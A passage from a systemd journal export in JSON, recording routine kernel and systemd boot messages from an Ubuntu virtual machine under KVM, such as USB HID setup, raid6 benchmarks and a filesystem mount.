"_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1652712", "MESSAGE" : "usb 1-1: SerialNumber: 42" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b6;b=e2b08827b5804427b422c10c84f1567e;m=5771df;t=5bd16dd1af147;x=74843213c1fa40c2", "__REALTIME_TIMESTAMP" : "1615280780013895", "__MONOTONIC_TIMESTAMP" : "5730783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1663951", "MESSAGE" : "hidraw: raw HID events driver (C) Jiri Kosina" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b7;b=e2b08827b5804427b422c10c84f1567e;m=5771eb;t=5bd16dd1af152;x=3fa757cf0911c4bc", "__REALTIME_TIMESTAMP" : "1615280780013906", "__MONOTONIC_TIMESTAMP" : "5730795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1672727", "MESSAGE" : "usbcore: registered new interface driver usbhid" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b8;b=e2b08827b5804427b422c10c84f1567e;m=5771f6;t=5bd16dd1af15d;x=d7ad4f6be75220d5", "__REALTIME_TIMESTAMP" : "1615280780013917", "__MONOTONIC_TIMESTAMP" : "5730806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1675949", "MESSAGE" : "usbhid: USB HID core driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b9;b=e2b08827b5804427b422c10c84f1567e;m=577201;t=5bd16dd1af168;x=bad386160cda6776", "__REALTIME_TIMESTAMP" : "1615280780013928", "__MONOTONIC_TIMESTAMP" : "5730817", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1680012", "MESSAGE" : "input: QEMU QEMU USB Tablet as /devices/pci0000:00/0000:00:01.2/usb1/1-1/1-1:1.0/0003:0627:0001.0001/input/input5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ba;b=e2b08827b5804427b422c10c84f1567e;m=5772b8;t=5bd16dd1af21f;x=60b309e1216b01cf", "__REALTIME_TIMESTAMP" : "1615280780014111", "__MONOTONIC_TIMESTAMP" : "5731000", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "hid", "_KERNEL_DEVICE" : "+hid:0003:0627:0001.0001", "_UDEV_SYSNAME" : "0003:0627:0001.0001", "_SOURCE_MONOTONIC_TIMESTAMP" : "1686104", "MESSAGE" : "hid-generic 0003:0627:0001.0001: input,hidraw0: USB HID v0.01 Mouse [QEMU QEMU USB Tablet] on usb-0000:00:01.2-1/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bb;b=e2b08827b5804427b422c10c84f1567e;m=5772c9;t=5bd16dd1af230;x=d78d55fa5ce30379", "__REALTIME_TIMESTAMP" : "1615280780014128", "__MONOTONIC_TIMESTAMP" : "5731017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3296328", "MESSAGE" : "raid6: sse2x1 gen() 7874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bc;b=e2b08827b5804427b422c10c84f1567e;m=5772d4;t=5bd16dd1af23b;x=ce4ea08b3ccb4878", "__REALTIME_TIMESTAMP" : "1615280780014139", "__MONOTONIC_TIMESTAMP" : "5731028", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3344238", "MESSAGE" : "raid6: sse2x1 xor() 5550 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bd;b=e2b08827b5804427b422c10c84f1567e;m=5772e4;t=5bd16dd1af24b;x=7bc7e78bc9790bf6", "__REALTIME_TIMESTAMP" : "1615280780014155", "__MONOTONIC_TIMESTAMP" : "5731044", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3392314", "MESSAGE" : "raid6: sse2x2 gen() 9546 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1be;b=e2b08827b5804427b422c10c84f1567e;m=5772ef;t=5bd16dd1af256;x=3dbd33bf27e28938", "__REALTIME_TIMESTAMP" : "1615280780014166", "__MONOTONIC_TIMESTAMP" : "5731055", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3440394", "MESSAGE" : "raid6: sse2x2 xor() 5985 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bf;b=e2b08827b5804427b422c10c84f1567e;m=5772fa;t=5bd16dd1af261;x=7565dec281561875", "__REALTIME_TIMESTAMP" : "1615280780014177", "__MONOTONIC_TIMESTAMP" : "5731066", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3488308", "MESSAGE" : "raid6: sse2x4 gen() 11387 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c0;b=e2b08827b5804427b422c10c84f1567e;m=577304;t=5bd16dd1af26c;x=ad30cde6b6b3611d", "__REALTIME_TIMESTAMP" : "1615280780014188", "__MONOTONIC_TIMESTAMP" : "5731076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3536314", "MESSAGE" : "raid6: sse2x4 xor() 7165 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c1;b=e2b08827b5804427b422c10c84f1567e;m=57730f;t=5bd16dd1af276;x=298656716ca4c04c", "__REALTIME_TIMESTAMP" : "1615280780014198", "__MONOTONIC_TIMESTAMP" : "5731087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3584342", "MESSAGE" : "raid6: avx2x1 gen() 15727 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c2;b=e2b08827b5804427b422c10c84f1567e;m=57731a;t=5bd16dd1af281;x=b8ab218585856e3", "__REALTIME_TIMESTAMP" : "1615280780014209", "__MONOTONIC_TIMESTAMP" : "5731098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3632230", "MESSAGE" : "raid6: avx2x1 xor() 10348 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c3;b=e2b08827b5804427b422c10c84f1567e;m=577325;t=5bd16dd1af28c;x=c972aafa65f71950", "__REALTIME_TIMESTAMP" : "1615280780014220", "__MONOTONIC_TIMESTAMP" : "5731109", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3680173", "MESSAGE" : "raid6: avx2x2 gen() 18874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c4;b=e2b08827b5804427b422c10c84f1567e;m=57732f;t=5bd16dd1af297;x=f9956d03be3640d1", "__REALTIME_TIMESTAMP" : "1615280780014231", "__MONOTONIC_TIMESTAMP" : "5731119", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3728145", "MESSAGE" : "raid6: avx2x2 xor() 11197 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c5;b=e2b08827b5804427b422c10c84f1567e;m=57733a;t=5bd16dd1af2a2;x=e3598bac0d84f0c6", "__REALTIME_TIMESTAMP" : "1615280780014242", "__MONOTONIC_TIMESTAMP" : "5731130", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3776130", "MESSAGE" : "raid6: avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c6;b=e2b08827b5804427b422c10c84f1567e;m=577345;t=5bd16dd1af2ac;x=b7e90dc8886b1e0d", "__REALTIME_TIMESTAMP" : "1615280780014252", "__MONOTONIC_TIMESTAMP" : "5731141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3824241", "MESSAGE" : "raid6: avx2x4 xor() 13990 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c7;b=e2b08827b5804427b422c10c84f1567e;m=577352;t=5bd16dd1af2ba;x=5b95a6e5199c574c", "__REALTIME_TIMESTAMP" : "1615280780014266", "__MONOTONIC_TIMESTAMP" : "5731154", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3826541", "MESSAGE" : "raid6: using algorithm avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c8;b=e2b08827b5804427b422c10c84f1567e;m=57735d;t=5bd16dd1af2c5;x=8d5b31e4c883c5fd", "__REALTIME_TIMESTAMP" : "1615280780014277", "__MONOTONIC_TIMESTAMP" : "5731165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3829277", "MESSAGE" : "raid6: .... xor() 13990 MB/s, rmw enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c9;b=e2b08827b5804427b422c10c84f1567e;m=577368;t=5bd16dd1af2cf;x=6bc886e2a58855e5", "__REALTIME_TIMESTAMP" : "1615280780014287", "__MONOTONIC_TIMESTAMP" : "5731176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3831902", "MESSAGE" : "raid6: using avx2x2 recovery algorithm" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ca;b=e2b08827b5804427b422c10c84f1567e;m=577394;t=5bd16dd1af2fb;x=5df3582cd4095529", "__REALTIME_TIMESTAMP" : "1615280780014331", "__MONOTONIC_TIMESTAMP" : "5731220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3836699", "MESSAGE" : "xor: automatically using best checksumming function avx " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cb;b=e2b08827b5804427b422c10c84f1567e;m=5773a0;t=5bd16dd1af308;x=cc096be16c5b0a3a", "__REALTIME_TIMESTAMP" : "1615280780014344", "__MONOTONIC_TIMESTAMP" : "5731232", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3842043", "MESSAGE" : "async_tx: api initialized (async)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cc;b=e2b08827b5804427b422c10c84f1567e;m=5773af;t=5bd16dd1af316;x=6d453969632a59c1", "__REALTIME_TIMESTAMP" : "1615280780014358", "__MONOTONIC_TIMESTAMP" : "5731247", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3908006", "MESSAGE" : "Btrfs loaded, crc32c=crc32c-intel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cd;b=e2b08827b5804427b422c10c84f1567e;m=5773bd;t=5bd16dd1af324;x=967a662793c4f2ca", "__REALTIME_TIMESTAMP" : "1615280780014372", "__MONOTONIC_TIMESTAMP" : "5731261", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "3937225", "MESSAGE" : "random: fast init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ce;b=e2b08827b5804427b422c10c84f1567e;m=5773c9;t=5bd16dd1af330;x=69fd3a294d658dcf", "__REALTIME_TIMESTAMP" : "1615280780014384", "__MONOTONIC_TIMESTAMP" : "5731273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "4003689", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cf;b=e2b08827b5804427b422c10c84f1567e;m=5773d4;t=5bd16dd1af33c;x=fd3648774e170cb5", "__REALTIME_TIMESTAMP" : "1615280780014396", "__MONOTONIC_TIMESTAMP" : "5731284", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", "_SOURCE_MONOTONIC_TIMESTAMP" : "4007486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d0;b=e2b08827b5804427b422c10c84f1567e;m=5773f1;t=5bd16dd1af359;x=e99a633f94b1be11", "__REALTIME_TIMESTAMP" : "1615280780014425", "__MONOTONIC_TIMESTAMP" : "5731313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", "_SOURCE_MONOTONIC_TIMESTAMP" : "4011196" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d1;b=e2b08827b5804427b422c10c84f1567e;m=577400;t=5bd16dd1af367;x=f558cf2ce7cf1e96", "__REALTIME_TIMESTAMP" : "1615280780014439", "__MONOTONIC_TIMESTAMP" : "5731328", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4095523", "MESSAGE" : "EXT4-fs (vda1): mounted filesystem with ordered data mode. Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d2;b=e2b08827b5804427b422c10c84f1567e;m=57740c;t=5bd16dd1af374;x=9b3dda8076202fc4", "__REALTIME_TIMESTAMP" : "1615280780014452", "__MONOTONIC_TIMESTAMP" : "5731340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4792547", "MESSAGE" : "ip_tables: (C) 2000-2006 Netfilter Core Team" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d3;b=e2b08827b5804427b422c10c84f1567e;m=57741c;t=5bd16dd1af383;x=1cbee677ef6ff7e8", "__REALTIME_TIMESTAMP" : "1615280780014467", "__MONOTONIC_TIMESTAMP" : "5731356", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4828132", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "MESSAGE" : "systemd 237 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d4;b=e2b08827b5804427b422c10c84f1567e;m=57742b;t=5bd16dd1af393;x=61db57ed35ef3db6", "__REALTIME_TIMESTAMP" : "1615280780014483", "__MONOTONIC_TIMESTAMP" : "5731371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4838029", "MESSAGE" : "Detected virtualization kvm." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d5;b=e2b08827b5804427b422c10c84f1567e;m=57743b;t=5bd16dd1af3a3;x=6cad4666b4b66f5a", "__REALTIME_TIMESTAMP" : "1615280780014499", "__MONOTONIC_TIMESTAMP" : "5731387", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4840668", "MESSAGE" : "Detected architecture x86-64." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d6;b=e2b08827b5804427b422c10c84f1567e;m=577448;t=5bd16dd1af3b0;x=7d956334ef22c29d", "__REALTIME_TIMESTAMP" : "1615280780014512", "__MONOTONIC_TIMESTAMP" : "5731400", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4855210", "MESSAGE" : "Set hostname to ." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d7;b=e2b08827b5804427b422c10c84f1567e;m=577455;t=5bd16dd1af3bc;x=cc15926571e6ef3b", "__REALTIME_TIMESTAMP" : "1615280780014524", "__MONOTONIC_TIMESTAMP" : "5731413", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4870328", "MESSAGE" : "Initializing machine ID from KVM UUID." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d8;b=e2b08827b5804427b422c10c84f1567e;m=577461;t=5bd16dd1af3c9;x=601f89e0a8d6d00d", "__REALTIME_TIMESTAMP" : "1615280780014537", "__MONOTONIC_TIMESTAMP" : "5731425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4874166", "MESSAGE" : "Installed transient /etc/machine-id file." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d9;b=e2b08827b5804427b422c10c84f1567e;m=57746f;t=5bd16dd1af3d6;x=17ecf4b5c6f614fc", "__REALTIME_TIMESTAMP" : "1615280780014550", "__MONOTONIC_TIMESTAMP" : "5731439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5338460", "MESSAGE" : "Reached target Swap." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1da;b=e2b08827b5804427b422c10c84f1567e;m=57747b;t=5bd16dd1af3e3;x=c8c921c7a0c85d5a", "__REALTIME_TIMESTAMP" : "1615280780014563", "__MONOTONIC_TIMESTAMP" : "5731451", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5343107", "MESSAGE" : "Reached target User and Group Name Lookups." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1db;b=e2b08827b5804427b422c10c84f1567e;m=577487;t=5bd16dd1af3ef;x=f8a48c4940b6d242", "__REALTIME_TIMESTAMP" : "1615280780014575", "__MONOTONIC_TIMESTAMP" : "5731463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5349139", "MESSAGE" : "Set up automount Arbitrary Executable File Formats File System Automount Point." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dc;b=e2b08827b5804427b422c10c84f1567e;m=577494;t=5bd16dd1af3fc;x=fc4678ab1b81a329", "__REALTIME_TIMESTAMP" : "1615280780014588", "__MONOTONIC_TIMESTAMP" : "5731476", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5356839", "MESSAGE" : "Created slice User and Session Slice." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dd;b=e2b08827b5804427b422c10c84f1567e;m=5774a1;t=5bd16dd1af408;x=ae62b745ca058a1c", "__REALTIME_TIMESTAMP" : "1615280780014600", 